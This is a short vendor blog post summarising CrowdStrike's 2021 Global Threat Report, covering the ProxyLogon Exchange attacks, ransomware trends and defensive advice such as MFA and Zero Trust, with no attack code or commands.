by Joe Hedegaard Ganly

Saepio Solutions Architect

Connect with Joe Hedegaard Ganly on Linkedin Connect with Joe Hedegaard Ganly on Linkedin

The 2021 Global Threat Report Insights

Working in the solutions team at Saepio I’m always amazed at the quantity and quality of intelligence and research that our vendor partners and customers alike conduct and share with the community. 2021 dealt a low blow to already exhausted incident response and forensics teams after dealing with a myriad of attacks of 2020. The Microsoft Exchange ProxyLogon CVE-2021-26855 was a mass attack that leveraged four separate vulnerabilities and led to anyone with an on-premise exchange server scrambling to mitigate risks.

One of the main features of this campaign was the relentless installation of web shells and initial exploitation which left the door open for others to attack. In contrast to SolarWinds which was highly targeted, the campaign seen against Exchange was broad and non-specific. Focused exploitation affected some, but the presence of webshells on many servers has led to further exploitation by eCrime groups in a separate wave of attacks.

Cyber Threat Report Insights

Cyber Threat Report Insights

Ransomware operators have been observed by CrowdStrike to be leveraging both Nation State APT style techniques, but also more traditional phishing and human vulnerability exploits. CrowdStrike’s tracking of eCrime groups and their behaviours is a large feature in their Global Threat Report 2021 and we highly recommend digesting it. The insight into the behaviours and groups to be wary of is truly informational and not sensationalised which is useful in helping plan mitigation strategies both on a technological and process level.

The high-level outcomes that I got from it and I hope you do too are;

  • How state-sponsored adversaries infiltrated networks to steal valuable data on vaccine research and government responses to the pandemic.
  • How criminal adversaries introduced new business models to expand their “big game hunting” ransomware activities — and made them even more potent with the addition of blackmail and extortion techniques.
  • How both eCrime and targeted intrusion adversaries stepped up their development efforts, deploying a variety of inventive new methods to evade detection and confound defenders.

Crucial Takeaways

If you can’t see it, you can’t protect it. For security teams operating in today’s environment, visibility and speed are critical for blocking attackers that have the capability and intent to steal data and disrupt operations. Security teams must understand that it is their responsibility to secure their cloud environments, just as they would on-premises systems. They must establish consistent visibility for all environments and proactively address potential vulnerabilities before they can be leveraged by attackers.

Protect identities and access. Organisations must consider multifactor authentication (MFA) on all public-facing employee services and portals as mandatory. In addition to MFA, a robust privilege access management process will limit the damage adversaries can do if they get in and reduce the likelihood of lateral movement. Finally, Zero Trust solutions should be implemented to compartmentalise and restrict data access, thus reducing the potential damages from unauthorised access to sensitive information.

 

The eCrime Ecosystem

An extract from the Crowdstrike report.

Crowdstrike 2021